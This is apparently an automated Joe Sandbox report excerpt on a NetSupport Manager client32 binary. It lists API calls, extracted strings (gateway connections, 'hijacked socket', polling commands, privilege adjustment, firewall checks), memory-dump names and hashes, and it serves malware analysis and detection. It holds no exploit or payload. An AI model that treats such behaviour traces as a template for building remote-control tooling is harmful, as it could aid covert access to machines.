getsockname.WSOCK32(00000000,?,?), ref: 6859AE4B
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AE60
GetTickCount.KERNEL32 ref: 6859AE6C
InterlockedExchange.KERNEL32(?,00000000), ref: 6859AE7A

Strings

Cannot connect to gateway %s, error %d, xrefs: 6859ACA6
Cannot connect to gateway %s via web proxy, error %d, xrefs: 6859AD14
Connect error to %s using hijacked socket, error %d, xrefs: 6859AB17
*TcpNoDelay, xrefs: 6859ABB8

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 692187944-2561115898
Opcode ID: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
Instruction ID: 19e6a8f323f29c85e24850b2e4ca5934d0a94c2982567c8896835727aa1d9333
Opcode Fuzzy Hash: e5e2543116c1c178c8091a40c7a64bb7115ccdae992da7a805c5cec0014acb38
Instruction Fuzzy Hash: D5E19375A402149FDF11DF68D890BEDB3B5EF88315F8041AAED19A7280DB709E84CFA5

Function 685991F0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 97sleepnetworkCOMMON

Download Yara Rule

APIs

#16.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859924C
WSAGetLastError.WSOCK32(00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 6859925B
GetTickCount.KERNEL32 ref: 68599274
Sleep.KERNEL32(00000001,00000000,?,a3Zh,00000000,00000000,?,00000007), ref: 685992A8
GetTickCount.KERNEL32 ref: 685992B0
Sleep.KERNEL32(00000014), ref: 685992BC

Strings

ReadSocket - Error %d reading response, xrefs: 685992F7
*RecvTimeout, xrefs: 6859927B
a3Zh, xrefs: 68599244
ReadSocket - Would block, xrefs: 6859928A
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68599226
ReadSocket - Connection has been closed by peer, xrefs: 685992E0
hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6859922B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CountSleepTick$ErrorLast
String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3Zh$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
API String ID: 2495545493-1096684884
Opcode ID: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
Instruction ID: edc879204cff4bdf9013b3b646520309aa2927875271b2d62d72d76eb8c5f498
Opcode Fuzzy Hash: b5925360083a57d19c58249876366d12ba0b5fca48a5ea9abd192e68da549f5a
Instruction Fuzzy Hash: 2031A23AE80248EFDF10DFBCE988B9EB7F4EB85315F8044A9E908D7140E73199508B91

Function 685A3130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,97A2354D,89DA8021,97A234B3,FFFFFFFF,00000000), ref: 685A31E2
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A31EC
GetSystemTime.KERNEL32(?,89DA8021,97A234B3,FFFFFFFF,00000000), ref: 685A322A
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,685CECB0), ref: 685A3234
EnterCriticalSection.KERNEL32(685DB898,?,97A2354D), ref: 685A32BE
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 685A32D3
GetCurrentThreadId.KERNEL32 ref: 685A334D

Part of subcall function 685ABA20: __strdup.LIBCMT ref: 685ABA3A

Part of subcall function 685ABB00: _free.LIBCMT ref: 685ABB2D

Strings

INFO=1, xrefs: 685A3304
ACK=1, xrefs: 685A3312
1.1, xrefs: 685A3240, 685A324A
CMD=POLL, xrefs: 685A32F4

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
Instruction ID: 49227012a016f7c2ab4a82d9b13a2c96863fc9b37b58f8714e9526c00b33a5b1
Opcode Fuzzy Hash: 45c4023052b712fd4c58dc05647e5a7416511ec50250fa07931a60422d5bb665
Instruction Fuzzy Hash: B4614176904208EFCF14DFA4D884EEEB7B9FF49314F84451EE816A7240EB34A944CBA5

Function 11095C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11095CA4
CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9

Strings

HNetCfg.FwMgr, xrefs: 11095CB9
ICF Present: , xrefs: 11095D00

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFromInitializeInstanceProgUninitialize
String ID: HNetCfg.FwMgr$ICF Present:
API String ID: 3222248624-258972079
Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2

Function 11072460 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11072590
_memset.LIBCMT ref: 11072709

Strings

serial_no, xrefs: 1107254C
_License, xrefs: 11072551
NBCTL32.DLL, xrefs: 11072645

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
Instruction ID: d0e0b9ecbde65a2366102896099e84d523940e720fd040d90542ba2888ebc4af
Opcode Fuzzy Hash: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
Instruction Fuzzy Hash: CAB1A075E00219AFEB04CF98DC91FAEB7F5FF88304F148169E9599B295DB70A901CB90

Function 11030B10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34

Strings

Client32, xrefs: 11030B14
NSMWClass, xrefs: 11030B3F
NSMWClass, xrefs: 11030B53

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91

Function 1109DC20 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
EqualSid.ADVAPI32(?,00470EF8,?,00000001,00000001), ref: 1109DCB3

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791

Function 1109C750 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,7E4636A2,00080000,00000000,00000000), ref: 1109C77D
OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61

Function 1109C7E0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64

Function 1102E15E Relevance: 209.8, APIs: 31, Strings: 88, Instructions: 1502COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00002000), ref: 1102E234
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266

Strings

DisableAudioFilter, xrefs: 1102EB09, 1102EEE1
hClientRunning = %x, pid=%d (x%x), xrefs: 1102E51A
Client, xrefs: 1102E539, 1102EA48, 1102EAD5, 1102EAF6, 1102EB64, 1102EB7C, 1102EB94, 1102EBBE, 1102EBE8, 1102EC1E, 1102EC53, 1102EC6B, 1102EC83, 1102EC9B, 1102ECB3, 1102ECCB, 1102ECF1, 1102ED09, 1102ED21, 1102ED39, 1102ED51, 1102ED69, 1102ED81, 1102ED99, 1102EEAA, 1102F490, 1102F536, 1102F57F, 1102F75A, 1102F7B1, 1102F7CD, 1102F7F4, 1102F904, 1102F91F, 1102F940, 1102FA31
WRh, xrefs: 1102E349
jj, xrefs: 1102F4FE
pcicl32, xrefs: 1102E3C4
Bridge, xrefs: 1102E52D
*StartupDelay, xrefs: 1102F48B
jjjj, xrefs: 1102F80A
WPh, xrefs: 1102E325
DisableHelp, xrefs: 1102ED94
NSA.LIC, xrefs: 1102E57B, 1102E582, 1102E5A5
gClient.hNotifyEvent, xrefs: 1102E27F
closed ok, xrefs: 1102E4CE
NeedsReinstall, xrefs: 1102EA43
View, xrefs: 1102E545, 1102E945, 1102E95C, 1102E97D
DisableJoinClass, xrefs: 1102EC4E, 1102ECEC
DisableJournal, xrefs: 1102EC96, 1102ED34
EnableGradientCaptions, xrefs: 1102E940, 1102E957, 1102E978
AlwaysOnTop, xrefs: 1102F7EF
V12.10.4, xrefs: 1102F3F3, 1102F427
_debug, xrefs: 1102F46E
DisableTSAdmin, xrefs: 1102EAB8
_debug, xrefs: 1102E85D, 1102E9B6, 1102FA64
CLIENT32.CPP, xrefs: 1102E27A, 1102E80B
DisableRequestHelp, xrefs: 1102EC7E, 1102ED1C
V12.00.4, xrefs: 1102F3EC
DisableAudio, xrefs: 1102EAD0, 1102EAF1, 1102EB5F, 1102ECC6, 1102ED64
Error. Wrong hardware. Terminating, xrefs: 1102E759
Info. Client running as user=%s, type=%d, xrefs: 1102E492
Global\NSMWClassAdmin, xrefs: 1102F9FA
*BeepUsingSpeaker, xrefs: 1102EDD9
Session shutting down, exiting..., xrefs: 1102E23E
DisableConsoleClient, xrefs: 1102EAA0, 1102EB35
General, xrefs: 1102E998, 1102EA6F, 1102EDDE, 1102EE11
client32, xrefs: 1102E655, 1102E7F2
EnableSmartcardAuth, xrefs: 1102F93B
NoFTWhenLoggedOff, xrefs: 1102ED7C
ScreenScrape, xrefs: 1102EB8F, 1102EBB9, 1102EBE3
*PriorityClass, xrefs: 1102F7C8
Ready, xrefs: 1102FBC1
DisableReplayMenu, xrefs: 1102EC66, 1102ED04
Windows Ding.wav, xrefs: 1102EE41
Intel error "%s", xrefs: 1102E7B8
NSMWControl32, xrefs: 1102FB52
t&h, xrefs: 1102E22D
*ListenPort, xrefs: 1102FAFE
NSM.LIC, xrefs: 1102E56D, 1102E60B
NSTWControl32, xrefs: 1102FBAA
win8ui, xrefs: 1102E858
MiniDumpType, xrefs: 1102E9B1
Default, xrefs: 1102FB4B, 1102FB7A, 1102FBA3
istaUI, xrefs: 1102E166
Info. Client already running, pid=%d (x%x), xrefs: 1102E43F
Windows 95, xrefs: 1102EF29
DisableJournalMenu, xrefs: 1102ECAE, 1102ED4C
TCPIP, xrefs: 1102FB03
s, xrefs: 1102E3A8
226546, xrefs: 1102F5ED, 1102F687, 1102F764
*ScreenScrape, xrefs: 1102F531, 1102F57A, 1102F7AC
NSMWClassVista, xrefs: 1102E1E5
u.j, xrefs: 1102EE2F
Windows XP Ding.wav, xrefs: 1102EE48
WRh, xrefs: 1102E2F4
UseLegacyPrintCapture, xrefs: 1102EEA5
TraceIPC, xrefs: 1102FA5F
|, xrefs: 1102E2DF
LSPloaded=%d, WFPloaded=%d, xrefs: 1102EA2A
AssertTimeout, xrefs: 1102E993
NSMWClass, xrefs: 1102E1F6, 1102E3D7, 1102E4E4, 1102F9EF
UseIPC, xrefs: 1102FA2C
ShowKBEnable, xrefs: 1102EC19
RWh, xrefs: 1102E452
RestartAfterError, xrefs: 1102EA6A
Error x%x reading nsm.lic, sesh=%d, xrefs: 1102E5D6
jj, xrefs: 1102F4E2
Audio, xrefs: 1102EB0E, 1102EEE6
TracePriv, xrefs: 1102F469
*BeepSound, xrefs: 1102EE0C
Info. Trying to close client, xrefs: 1102E4A4
\, xrefs: 1102E2BF
NSSWControl32, xrefs: 1102FB81
Error. Could not load transports - perhaps another client is running, xrefs: 1102F6C3
EnableSmartcardLogon, xrefs: 1102F8FF
UseNTSecurity, xrefs: 1102F91A
DisableRunplugin, xrefs: 1102EB77
|#j, xrefs: 1102EE9F
IsILS returned %d, isvistaservice %d, xrefs: 1102E72A

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
